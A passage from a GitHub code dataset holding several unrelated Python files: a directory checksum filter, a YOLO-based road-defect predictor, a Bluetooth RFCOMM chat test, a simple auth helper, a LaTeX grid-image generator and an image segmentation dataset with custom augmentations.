contents about to be written to\n                filename\n            filename: the file about to be populated with\n                proposed_contents\n\n        Returns:\n            True if the disk contents of the file are identical to\n            proposed_contents already and False otherwise.\n        \"\"\"\n        self._update_file(filename)\n        file_md5 = self.md5_by_filename.get(filename, 0)\n        logger.debug(\"%s's checksum is %s\", filename, file_md5)\n        mem_hash = hashlib.md5()\n        mem_hash.update(proposed_contents)\n        md5 = mem_hash.hexdigest()\n        logger.debug(\"Item's checksum is %s\", md5)\n        return md5 != file_md5\n\n\nclass DirectoryAllFilesFilter(DirectoryFileFilter):\n    \"\"\"A predicate that will return False if a file to-be-written to a\n    particular directory is identical to any other file in that same\n    directory (regardless of its name).\n\n    i.e. this is the same as :class:`DirectoryFileFilter` except that\n    our :meth:`apply` method will return False not only if the contents\n    to be written are identical to the contents of filename on the\n    disk but also it returns False if there exists some other file\n    sitting in the same directory which already contains those\n    identical contents.\n\n    >>> testfile = '/tmp/directory_filter_text_f39e5b58-c260-40da-9448-ad1c3b2a69c3.txt'\n\n    >>> contents = b'This is a test'\n    >>> with open(testfile, 'wb') as wf:\n    ...     wf.write(contents)\n    14\n\n    >>> d = DirectoryAllFilesFilter('/tmp')\n\n    >>> d.apply(contents) # False if _any_ file in /tmp contains contents\n    False\n\n    >>> d.apply(b'That was a test') # True otherwise\n    True\n\n    >>> os.remove(testfile)\n\n    \"\"\"\n\n    def __init__(self, directory: str):\n        \"\"\"\n        Args:\n            directory: the directory we're watching\n        \"\"\"\n        self.all_md5s: Set[str] = set()\n        super().__init__(directory)\n\n    def _update_file(self, filename: str, mtime: Optional[float] = None):\n        \"\"\"Internal method. Given a file and its mtime, update internal\n        state.\n        \"\"\"\n        from pyutils.files import file_utils\n\n        assert file_utils.does_file_exist(filename)\n        if mtime is None:\n            mtime = file_utils.get_file_raw_mtime(filename)\n        assert mtime is not None\n        if self.mtime_by_filename.get(filename, 0) != mtime:\n            md5 = file_utils.get_file_md5(filename)\n            self.mtime_by_filename[filename] = mtime\n            self.md5_by_filename[filename] = md5\n            self.all_md5s.add(md5)\n\n    def apply(\n        self, proposed_contents: Any, ignored_filename: Optional[str] = None\n    ) -> bool:\n        \"\"\"Call this before writing a new file to directory with the\n        proposed_contents to be written and it will return a value that\n        indicates whether the identical contents is already sitting in\n        *any* file in that directory. 
Useful, e.g., for caching.\n\n Args:\n proposed_contents: the contents about to be persisted to\n directory\n ignored_filename: unused for now, must be None\n\n Returns:\n True if proposed contents does not yet exist in any file in\n directory or False if it does exist in some file already.\n \"\"\"\n assert ignored_filename is None\n self._update()\n mem_hash = hashlib.md5()\n mem_hash.update(proposed_contents)\n md5 = mem_hash.hexdigest()\n return md5 not in self.all_md5s\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"scottgasch/pyutils","sub_path":"src/pyutils/files/directory_filter.py","file_name":"directory_filter.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"6423963689","text":"import cv2\n#import tensorflow as tf\n#from tensorflow import keras\nimport torch\nimport torchvision\nfrom torchvision import datasets, models, transforms\nfrom ultralytics import YOLO\nfrom PIL import Image\nimport numpy as np\nimport os\n#import subprocess\n\nclass ScoringService(object):\n @classmethod\n def get_model(cls, model_path):\n \"\"\"Get model method\n\n Args:\n model_path (str): Path to the trained model directory.\n\n Returns:\n bool: The return value. True for success.\n \"\"\"\n \n \n cls.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n #print(device)\n\n anomaly_models={}\n for category in [\"line\",\"sign\",\"light\"]:\n anomaly_models[category] = torch.load(os.path.join(model_path,f\"{category}.pth\")).to(cls.device)\n \n \"\"\"\n anomaly_models={}\n for category in [\"line\",\"sign\",\"light\"]:\n anomaly_models[category] = keras.models.load_model(os.path.join(model_path,f\"{category}_best.h5\"))\n \"\"\"\n cls.anomaly_models=anomaly_models\n\n cls.softmax = torch.nn.Softmax(dim=1)\n cls.data_transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n cls.yolo_model=YOLO(os.path.join(model_path,\"best.pt\"))\n \n return True\n\n\n @classmethod\n def predict(cls, input):\n \"\"\"Predict method\n\n Args:\n input: Data of the sample you want to make inference from (str)\n\n Returns:\n list: Inference for the given input.\n\n \"\"\"\n prediction = []\n cap = cv2.VideoCapture(input)\n frame_id = 0\n anomaly_label=['その他', '補修不要', '要補修']\n yolo_label=[\"line\",\"sign\",\"light\"]\n\n while True:\n ret, frame = cap.read()\n if ret:\n category_bool={n:0 for n in [\"line\",\"sign\",\"light\"]}\n im=Image.fromarray(frame)\n results=cls.yolo_model(source=im)\n for result in results[0].boxes:\n box=result.xyxy.tolist()[0]\n #conf=float(result.conf)\n cls_name=yolo_label[int(result.cls)]\n #print(box,conf,cls_name)\n #if (conf>0.2) and (category_bool[cls_name]==0):\n if (category_bool[cls_name]==0):\n crop_img=im.crop((box[0],box[1],box[2],box[3])).resize((224, 224))\n crop_img=cls.data_transform(crop_img)\n #pred=cls.anomaly_models[cls_name].predict(crop_img)\n pred=cls.anomaly_models[cls_name](crop_img.unsqueeze(dim=0).to(cls.device))\n pred=cls.softmax(pred)\n pred_label=anomaly_label[torch.argmax(pred)]\n #print(pred_label,pred)\n category_bool[cls_name]=1 if (pred_label=='要補修')and bool(pred[0][2]>0.8) else 0\n #print(category_bool)\n prediction.append({'frame_id':frame_id, 'line': category_bool[\"line\"], 'sign': category_bool[\"sign\"], 'light': category_bool[\"light\"]})\n \n frame_id += 1\n else:\n break\n \n \n \n\n return 
prediction","repo_name":"ryosuzaki/signate_2022","sub_path":"ワールドAI/sample_submit/src/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39988912129","text":"import socket\n\nADRESSE_MAC = \"88:83:5d:fd:7a:af\"\nPORT = 1\nDATA_SIZE = 1024\n\nserver = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\nserver.bind((ADRESSE_MAC, PORT))\nserver.listen(1)\n\ntry:\n print('Ecoute des connexions...')\n client, address = server.accept()\n print(\"Connectee a {}\".format(address))\n\n while True:\n data = client.recv(DATA_SIZE)\n if not data:\n break\n print(\"Message : {}\".format(data.decode('utf-8')))\n message = input(\"Entrer un message : \")\n client.send(message.encode('utf-8'))\nexcept OSError as error:\n print(\"ERROR : \", error)\n\nfinally:\n client.close()\n server.close()","repo_name":"lionel-nyamsi/PFE_2023","sub_path":"RaspberryPiApp_Ok/src/test_com.py","file_name":"test_com.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31765237810","text":"#!/usr/bin/env python3\r\n\"\"\"Create a class to handle authentication\"\"\"\r\n\r\nfrom typing import List, TypeVar, Union\r\nimport re\r\n\r\n\r\nclass Auth:\r\n \"\"\"A class to handle authentication APIs\"\"\"\r\n\r\n def require_auth(self, path: str,\r\n excluded_paths: List[str]) -> bool:\r\n \"\"\"\r\n Check if auth is needed\r\n :param path: str\r\n :param excluded_paths: List[str]\r\n :return: bool = False for now\r\n \"\"\"\r\n if path is None or excluded_paths is None or excluded_paths == []:\r\n return True\r\n if path[-1] != '/':\r\n path = path + '/'\r\n for excluded_path in excluded_paths:\r\n if excluded_path[-1] == '*':\r\n pat = excluded_path.split('*')\r\n pat = pat[0] + '.*'\r\n match = re.search(pat, path)\r\n if match:\r\n return False\r\n if path not in excluded_paths:\r\n return True\r\n else:\r\n return False\r\n\r\n def authorization_header(self, request=None) -> Union[str, None]:\r\n \"\"\"\r\n Provide a way to extract the authourization header\r\n :param request: object = flask request\r\n :return: str | None = None for now\r\n \"\"\"\r\n if request is None:\r\n return None\r\n elif request.headers.get(\"Authorization\"):\r\n return request.headers.get(\"Authorization\")\r\n else:\r\n return None\r\n\r\n def current_user(self, request=None) -> TypeVar('User'):\r\n \"\"\"\r\n Retrieves the current user's data\r\n :param request:\r\n :return:\r\n \"\"\"\r\n return None\r\n","repo_name":"chibuezeorjinta/alx-backend-user-data","sub_path":"0x01-Basic_authentication/api/v1/auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9643960873","text":"import json\nimport os\n\n\nMACROS = \"macros_task.txt\"\n\ndef get_macros(macros_file = MACROS):\n script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in\n rel_path = macros_file\n abs_file_path = os.path.join(script_dir, rel_path)\n with open(abs_file_path, 'r') as f:\n data = f.read()\n return data\n\n\n\n\ndef parse_task_file(task_file:str):\n with open(task_file, 'r') as f:\n data = f.read()\n\n task_type = data.split('\\n', 1)[0].split('\\t')[1]\n gridsz = eval(data.split('\\n', 2)[1].split('\\t')[1])\n\n ## read the next gridsz lines\n\n if task_type 
== 'karel':\n grid = data.split('\\n', gridsz[0] + 3 + gridsz[0] + 7)\n else:\n grid = data.split('\\n', gridsz[0] + 6)\n\n ## first line of grid\n grid_headings = grid[3].split('\\t')\n if('pregrid' not in grid_headings):\n print(\"Task doesn't contain pregrid.\")\n return None\n grid_mat = []\n for ele in grid[5:5+gridsz[0]-2]:\n row = ele.split('\\t')[2:gridsz[0]]\n grid_mat.append(row)\n\n\n ## agentloc, dir\n agent_loc = eval(grid[gridsz[0] + 4].split('\\t')[1])\n agent_loc = (agent_loc[0]-2, agent_loc[1]-2)\n agent_dir = grid[gridsz[0] + 5].split('\\t')[1]\n\n\n\n\n ## if task-type is karel, will have to return the post grid and agent loc\n if task_type == 'karel':\n post_grid_title = grid[gridsz[0] + 7].split('\\t')\n if('postgrid' not in post_grid_title):\n print(\"Task doesn't contain the postgrid\")\n return None\n post_grid_mat = []\n for ele in grid[gridsz[0] + 9:9 + gridsz[0] + gridsz[0] - 2]:\n row = ele.split('\\t')[2:gridsz[0]]\n post_grid_mat.append(row)\n\n ## final agentloc, dir\n post_agent_loc = eval(grid[gridsz[0] + 3 + gridsz[0] + 5].split('\\t')[1])\n post_agent_loc = (post_agent_loc[0] - 2, post_agent_loc[1] - 2)\n post_agent_dir = grid[gridsz[0] + 3 + gridsz[0] + 6].split('\\t')[1]\n\n\n if task_type == 'karel':\n return task_type, [agent_loc,post_agent_loc], [agent_dir,post_agent_dir] , [grid_mat, post_grid_mat]\n\n return task_type, [agent_loc], [agent_dir], [grid_mat]\n\n\n\n\ndef gen_latex_script(type:str, agent_loc: tuple, agent_dir: tuple, grid_mat:tuple, macros_file=MACROS):\n macros = get_macros(macros_file)\n\n ### beginning script\n begin_script = \"\\n\\\\begin{document}\\n\" \\\n \"\\\\tikzset{\\n\" \\\n \"box/.style={\" \\\n \"rectangle, draw=black, minimum size=0.25cm}\" \\\n \"}\\n\" \\\n \"\\centering\\n\" \\\n \"\\\\begin{tikzpicture}[\\n\" \\\n \"box/.style={rectangle,draw=black,minimum size=0.25cm\" \\\n \"}\\n]\" \\\n \"\\n%%%%% GRID\\n\"\n ### ending script\n if type == 'hoc':\n end_script = \"\\draw[draw=black, thick] (-0.15,-0.15) rectangle (2.40,2.40);\\n\" \\\n \"\\end{tikzpicture}\\n\" \\\n \"\\end{document}\"\n elif type == 'karel':\n end_script = \"\\draw[draw=black, thick] (-0.15,-0.15) rectangle (2.40,2.40);\\n\" \\\n \"\\draw[draw=black, thick] (2.6,-0.15) rectangle (5.15,2.4);\\n\"\\\n \"%%%%% adding the transition arrow\\n\"\\\n \"\\draw[-{Latex[scale=1.0]}] (2.4, 1.15) -- (2.6,1.15);\\n\"\\\n \"\\end{tikzpicture}\\n\" \\\n \"\\end{document}\"\n else:\n print(\"Unknown task type encountered\")\n return None\n\n\n ### create the task-grid with colors\n all_grid_colors = []\n y_max = len(grid_mat[0])-1\n grid_color = []\n goal_flag = False\n for ridx, row in enumerate(grid_mat[0]):\n for cidx, cell in enumerate(row):\n if(cell == '#'):\n grid_color.append('\\\\node[box, fill=gray!40] at '+str((cidx*0.25, (y_max-ridx)*0.25))+\"{};\\n\")\n elif(cell == '.'):\n grid_color.append('\\\\node[box, fill=white] at ' + str((cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif(cell == \"+\"):\n goal_flag = True\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at '+str((cidx * 0.25, (y_max - ridx) * 0.25))+\"{};\\n\"\n grid_color.append(goal_grid)\n elif (cell == 'x'):\n if type == 'hoc':\n goal_flag = True\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n (cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n else:\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str((cidx * 0.25, (y_max - ridx) * 
0.25)) + \"{};\\n\")\n grid_color.append(\n '\\\\node[draw, fill=yellow, diamond, inner sep=1.75pt,minimum size=0.75pt] at' + str(\n (cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\"\n )\n else:\n continue\n\n # add the goal state sign for HOC-tasks if not added\n if type == 'hoc' and not goal_flag:\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n (agent_loc[1][0] * 0.25, (y_max - agent_loc[1][1]) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n\n all_grid_colors.append(grid_color)\n\n if agent_dir[0] == \"east\":\n dart_dir = 0\n elif agent_dir[0] == \"north\":\n dart_dir = 90\n elif agent_dir[0] == \"south\":\n dart_dir = -90\n else:\n dart_dir = 180\n\n all_agents_pos = []\n all_agents_pos.append(\"\\\\node[draw, fill=blue!50, dart, rotate=\"+str(dart_dir)+\" ,inner sep=0.01pt, minimum size=4.4pt] at \"+str((agent_loc[0][0]* 0.25, (y_max - agent_loc[0][1]) * 0.25))+\"{};\\n\")\n\n ## If task type is karel, add additional post grid code\n if type == 'karel':\n postgridscript = \"\\n%%%%% POSTGRID\\n\" \\\n \"[\\nbox/.style={rectangle,draw=black,minimum size=0.25cm\" \\\n \"}\\n]\"\n ### create the task-grid with colors\n y_max = len(grid_mat[1]) - 1\n grid_color = []\n for ridx, row in enumerate(grid_mat[1]):\n for cidx, cell in enumerate(row):\n if (cell == '#'):\n grid_color.append(\n '\\\\node[box, fill=gray!40] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif (cell == '.'):\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif (cell == \"+\"):\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n ((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n elif (cell == 'x'):\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n grid_color.append(\n '\\\\node[draw, fill=yellow, diamond, inner sep=1.75pt,minimum size=0.75pt] at' + str(\n ((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n else:\n continue\n\n all_grid_colors.append(grid_color)\n if agent_dir[1] == \"east\":\n dart_dir = 0\n elif agent_dir[1] == \"north\":\n dart_dir = 90\n elif agent_dir[1] == \"south\":\n dart_dir = -90\n else:\n dart_dir = 180\n\n all_agents_pos.append(\"\\\\node[draw, fill=blue!50, dart, rotate=\" + str(\n dart_dir) + \" ,inner sep=0.01pt, minimum size=4.4pt] at \" + str(\n ((agent_loc[1][0] * 0.25)+2.75, (y_max - agent_loc[1][1]) * 0.25)) + \"{};\\n\")\n\n\n ### combine the whole script\n script = macros + begin_script\n for ele in all_grid_colors[0]: # pregrid\n script = script + ele\n script = script + all_agents_pos[0] # pre-agent pos\n for ele in all_grid_colors[1]: # post grid\n script = script + ele\n script = script + all_agents_pos[1] + end_script # post-agent pos\n return script\n\n\n\n ### combine the whole script\n script = macros+ begin_script\n for ele in all_grid_colors[0]:\n script = script + ele\n script = script + all_agents_pos[0] + end_script\n\n return script\n\ndef gen_task_script(task_file, macros_file = MACROS):\n\n type, loc, dir, mat = parse_task_file(task_file)\n script = gen_latex_script(type, loc, dir, mat, macros_file)\n\n return script\n\n\ndef get_task_image(taskfile:str, taskfolder:str, taskimg: str):\n\n task_script = gen_task_script(taskfile)\n with open(taskfolder + '/' + taskimg + '.tex', 'w') as fp:\n fp.write(\"%s\" % task_script)\n\n # 
generate the image file\n input_path = taskfolder + '/' + taskimg + '.tex'\n os_cmd = \"pdflatex -interaction=nonstopmode -output-directory \" + taskfolder + \" %s\"\n os.system(os_cmd % (input_path))\n output_path = taskfolder + \"/\" + taskimg + '.jpg'\n os_cmd = \"convert -density 1200 -quality 100 \" + taskfolder + \"/\" + taskimg + \".pdf %s\"\n os.system(os_cmd % (output_path))\n\n print(\"Generated task image\")\n return 0\n\n\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/utils/gen_task_image.py","file_name":"gen_task_image.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20807221466","text":"import os\nimport cv2\nimport glob\nimport json\nimport random\nimport warnings\n\nimport numpy as np\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import Dataset, DataLoader\nfrom albumentations import ImageOnlyTransform\n\nwarnings.filterwarnings(\"ignore\")\n\nclass InhomogenousColorAug(ImageOnlyTransform):\n def __init__(self, \n always_apply: bool = True, \n p: float = 1.0, \n max_pixel_detla=80.,\n aug_offline_path=\"database\"):\n self.detla_files = glob.glob(os.path.join(aug_offline_path, \"*.npy\"))\n self.detla_infos = {\n \"detla_file\": self.detla_files[0],\n \"count\": 0,\n }\n self.max_pixel_detla = max_pixel_detla\n self.count = 1\n super(InhomogenousColorAug, self).__init__(always_apply, p)\n \n def adjust_gamma(self, image, gamma=1.0):\n brighter_image = np.array(np.power((image / 255.), \n gamma[:, :, None]) * 255, dtype=np.uint8)\n return brighter_image\n\n def apply(self, image, **params):\n if self.count % 10 == 0:\n idx = int(len(self.detla_files) * random.random())\n detla_file = self.detla_files[idx]\n self.detla_infos[\"detla_file\"] = detla_file\n detla_offsets = np.load(self.detla_infos[\"detla_file\"])\n self.detla_infos[\"detla_offsets\"]= detla_offsets\n if \"detla_offsets\" in self.detla_infos:\n detla_offsets = self.detla_infos[\"detla_offsets\"]\n else:\n detla_offsets = np.load(self.detla_infos[\"detla_file\"])\n self.detla_infos[\"detla_offsets\"]= detla_offsets\n # print(\"detla_file: \", self.detla_infos[\"detla_file\"]) \n self.count += 1\n src_h, src_w = image.shape[:2]\n dh, dw = detla_offsets.shape\n cropped_h = dh * (random.randint(70, 100) / 100.)\n cropped_w = dw * (random.randint(70, 100) / 100.)\n \n y_pos = max(0, int(random.random() * (dh - cropped_h - 2)))\n ty = int(y_pos + cropped_h) \n x_pos = max(0, int(random.random() * (dw - cropped_w - 2)))\n tx = int(x_pos + cropped_w) \n crop_detla = detla_offsets[y_pos : ty, x_pos : tx]\n crop_detla = cv2.resize(crop_detla, (src_w, src_h))\n color_detla = crop_detla * self.max_pixel_detla\n if random.random() < 0.3:\n color_detla = -1. 
* color_detla\n # cv2.imwrite(\"detla.png\", 255 * (color_detla - color_detla.min()) / (color_detla.max() - color_detla.min()))\n # if random.random() < 0.5: \n # color_detla = np.rot90(color_detla)\n if random.random() < 0.5:\n if random.random() < 0.5:\n color_detla = color_detla[::-1, :]\n else:\n color_detla = color_detla[:, ::-1]\n return self.adjust_gamma(image, (color_detla + 1.5) ** 1.2)\n # image_tmp = image.copy()\n # image_tmp = np.transpose(image.copy(), (2, 0, 1)).astype(np.float32)\n # img_aug = image.astype(np.float32) + color_detla[:, :, None]\n # return img_aug.clip(0, 255).astype(np.uint8)\n # return np.transpose(img_aug.clip(0, 255), (1, 2, 0)).astype(np.uint8)\n \nclass InhomogenousOffsetAug(ImageOnlyTransform):\n def __init__(self, \n always_apply: bool = True, \n p: float = 1.0, \n target_size=256, \n offset_val=80., \n curve_period=1200.):\n # self.target_size = target_size\n self.offset_val = offset_val\n self.curve_period = curve_period\n self.line_length = 1200\n # self.detla_x = np.arange(0, self.target_size)[None, :].repeat(self.target_size, 0).astype(np.float32)\n # self.detla_y = np.arange(0, self.target_size)[:, None].repeat(self.target_size, 1).astype(np.float32) \n super(InhomogenousOffsetAug, self).__init__(always_apply, p)\n\n def apply(self, image, **params):\n src_h, src_w = image.shape[:2]\n detla_x = np.arange(0, src_w)[None, :].repeat(src_h, 0).astype(np.float32)\n detla_y = np.arange(0, src_h)[:, None].repeat(src_w, 1).astype(np.float32) \n offset_val = (self.offset_val + 15. * (random.random() - 0.5) * 2.)\n curve_period = (self.curve_period + 200. * (random.random() - 0.5) * 2.)\n offset = offset_val * np.sin(2 * np.pi * \\\n np.arange(0, self.line_length) / curve_period)\n if random.random() < 0.5:\n pose_idx = max(0, int((self.line_length - src_w - 2) * random.random()))\n cropped_offset = offset[pose_idx : pose_idx + src_w]\n crop_detla_x = detla_x + cropped_offset\n crop_detla_y = detla_y\n else:\n pose_idx = max(0, int((self.line_length - src_h - 2) * random.random()))\n cropped_offset = offset[pose_idx : pose_idx + src_h] \n crop_detla_x = detla_x\n crop_detla_y = detla_y + cropped_offset[:, None]\n image_aug = cv2.remap(image.astype(np.float32),\n crop_detla_x.astype(np.float32),\n crop_detla_y.astype(np.float32),\n cv2.INTER_NEAREST,\n borderMode=cv2.BORDER_DEFAULT,\n borderValue=0).astype(np.uint8) \n return image_aug\n \nclass ImageDataset(Dataset):\n def __init__(self, \n cfg, \n roots, \n mode='train', \n train_size=(544, 960), \n crop_size=(512, 512),\n weak_aug=False,\n scale=(0.99, 1.01),\n semi_training=False,\n add_adeptive_noise=False,\n focus_add_adeptive_noise=False,\n max_pixel_detla=90.,\n sup_color_aug_probs=0.1,\n sup_offset_aug_probs=0.2, \n aug_offline_path=\"./database/zerowaste/detla_offsets\", \n ):\n self.cfg = cfg\n self.mode = mode\n self.scale = scale\n self.semi_training = semi_training\n self.crop_size = crop_size\n self.train_size = train_size\n self.add_adeptive_noise = add_adeptive_noise\n self.focus_add_adeptive_noise = focus_add_adeptive_noise\n self.max_pixel_detla = max_pixel_detla\n self.sup_color_aug_probs = sup_color_aug_probs\n self.sup_offset_aug_probs = sup_offset_aug_probs\n self.aug_offline_path = aug_offline_path\n self.gts = []\n self.images = []\n self.dataset_lens = []\n self.base_path = \"/root/autodl-tmp/zerowaste_database_resized\"\n for root in roots:\n if mode == 'train':\n with open(os.path.join(root, \"{}.json\".format(mode)), \"r\") as f:\n train_images = json.load(f)\n 
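# n.b.: the sorted() call below re-orders _images, so this shuffle only has an effect if a subset of train_images were taken beforehand\n                    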
random.shuffle(train_images)\n _images = sorted(\n [os.path.join(self.base_path, mode, \"data\", train_image) for train_image in train_images])\n _gts = sorted([_image.replace(\"/data/\", \"/sem_seg/\") for _image in _images])\n if weak_aug:\n self.transform = self.get_weak_augmentation()\n else:\n self.transform = self.get_augmentation()\n elif mode == 'test':\n with open(os.path.join(root, \"{}.json\".format(mode)), \"r\") as f:\n test_images = json.load(f)\n _images = sorted([os.path.join(self.base_path, mode, \"data\", test_image) for test_image in test_images])\n _gts = sorted([_image.replace(\"/data/\", \"/sem_seg/\") for _image in _images])\n self.transform = A.Compose([\n A.Resize(self.train_size[0], self.train_size[1], interpolation=cv2.INTER_NEAREST), \n # A.Resize(train_size, train_size, interpolation=cv2.INTER_NEAREST), \n ])\n elif mode == 'unlabeled':\n with open(os.path.join(root, \"train_mini_{}.json\".format(mode)), 'r') as f:\n unlabeled_train_images = json.load(f)\n _images = sorted(\n [os.path.join(self.base_path, \"zerowaste-s-parts\", \"data\", unlabeled_train_image) for unlabeled_train_image in unlabeled_train_images])\n _gts = sorted([_image for _image in _images])\n # _gts = sorted([_image.replace(\"/images/\", \"/masks/\") for _image in _images])\n if weak_aug:\n self.transform = self.get_weak_augmentation()\n else:\n self.transform = self.get_augmentation()\n else:\n raise KeyError('MODE ERROR: {}'.format(mode))\n \n self.images += _images\n self.gts += _gts\n self.dataset_lens.append(len(self.images))\n # self.filter_files()\n self.size = len(self.images)\n self.to_tensors = A.Compose([A.Normalize(), ToTensorV2()])\n self.offset_aug = A.Compose([InhomogenousOffsetAug(\n offset_val=cfg.DATA.OFFSET_VALUE,\n curve_period=cfg.DATA.CURVE_PERIOD,\n )])\n self.color_aug = A.Compose([\n InhomogenousColorAug(p=1.0, \n max_pixel_detla=max_pixel_detla, \n aug_offline_path=aug_offline_path),\n # A.RGBShift(r_shift_limit=25, g_shift_limit=25, b_shift_limit=25, p=0.5),\n # A.RandomBrightnessContrast(p=0.2), \n ])\n\n def __len__(self):\n return self.size\n\n def lens(self):\n return self.dataset_lens\n\n def __getitem__(self, index):\n src_image = cv2.imread(self.images[index])\n image = cv2.cvtColor(src_image, cv2.COLOR_BGR2RGB)\n seg_mask = cv2.imread(self.gts[index], cv2.IMREAD_GRAYSCALE)\n # seg_mask[seg_mask < 128] = 0\n # seg_mask[seg_mask >= 128] = 1\n # assert seg_mask.max() == 1 or seg_mask.max() == 0\n data_np = self.transform(image=image, mask=seg_mask)\n wo_aug_image = data_np[\"image\"]\n wo_aug_mask = data_np[\"mask\"]\n if random.random() < self.sup_offset_aug_probs:\n # cv2.imwrite(\"aug_f/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_f/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n cat_aug_image = self.offset_aug(\n image=np.concatenate((wo_aug_image, wo_aug_mask[:, :, None]), -1))[\"image\"]\n wo_aug_image = cat_aug_image[:, :, :3]\n wo_aug_mask = cat_aug_image[:, :, -1]\n # cv2.imwrite(\"aug_f/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_f/{}_msk2.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n if self.focus_add_adeptive_noise:\n aug_image = self.color_aug(image=wo_aug_image)[\"image\"]\n # cv2.imwrite(\"aug_c/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_c/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), 
aug_image)\n # cv2.imwrite(\"aug_c/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255) \n else:\n if not self.add_adeptive_noise:\n aug_image = wo_aug_image\n else:\n if random.random() < self.sup_color_aug_probs:\n aug_image = self.color_aug(image=wo_aug_image)[\"image\"]\n # cv2.imwrite(\"aug_c/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_c/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), aug_image)\n # cv2.imwrite(\"aug_c/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n else:\n aug_image = wo_aug_image\n \n data_tensor = self.to_tensors(\n image=aug_image,\n mask=wo_aug_mask,\n )\n wo_aug_data_tensor = self.to_tensors(\n image=wo_aug_image,\n )\n data = {'imidx': index, \n 'path': self.images[index], \n 'image': data_tensor['image'], \n 'wo_aug_image': wo_aug_data_tensor['image'], \n 'seg_mask': data_tensor['mask'],\n }\n return data\n\n def filter_files(self):\n assert len(self.images) == len(self.gts)\n for img_path, gt_path in zip(self.images, self.gts):\n img = cv2.imread(img_path)\n gt = cv2.imread(gt_path)\n # assert gt.max() == 255\n assert gt.min() == 0\n # assert img.shape == gt.shape\n assert img_path.split('/')[-1].split('.')[0].split('_')[0] == \\\n gt_path.split('/')[-1].split('.')[0].split('_')[0], (img_path, gt_path)\n\n def get_augmentation(self):\n return A.Compose([\n A.Resize(self.train_size + 64, self.train_size + 64, \n interpolation=cv2.INTER_NEAREST),\n A.HorizontalFlip(),\n A.VerticalFlip(),\n A.RandomRotate90(),\n A.ShiftScaleRotate(shift_limit=0.2, scale_limit=0.2, rotate_limit=30, p=0.5),\n A.RGBShift(r_shift_limit=25, g_shift_limit=25, b_shift_limit=25, p=0.5),\n A.RandomBrightnessContrast(p=0.2),\n A.RandomSizedCrop(min_max_height=(self.crop_size, self.train_size + 32),\n height=self.train_size, width=self.train_size,\n w2h_ratio=1.0, interpolation=cv2.INTER_NEAREST, p=0.8),\n A.Resize(self.train_size, self.train_size, interpolation=cv2.INTER_NEAREST)\n ])\n\n def get_weak_augmentation(self):\n return A.Compose([\n A.HorizontalFlip(p=0.2),\n A.VerticalFlip(p=0.2),\n # A.RandomRotate90(p=0.2),\n A.Resize(self.train_size[0], self.train_size[1], \n interpolation=cv2.INTER_NEAREST), \n A.RandomCrop(self.crop_size[0], self.crop_size[1]), \n ])\n\ndef get_dataset(mode, \n cfg, \n train_size=(544, 960),\n crop_size=512, \n scale=(0.75, 1), \n weak_aug=False,\n semi_training=False,\n add_adeptive_noise=False,\n focus_add_adeptive_noise=False,\n max_pixel_detla=40.,\n sup_color_aug_probs=0.1,\n sup_offset_aug_probs=0.1, \n aug_offline_path=\"./database/zerowaste/detla_offsets\", \n ):\n data_root = []\n if \"zerowaste\" in cfg.DATA.NAME:\n 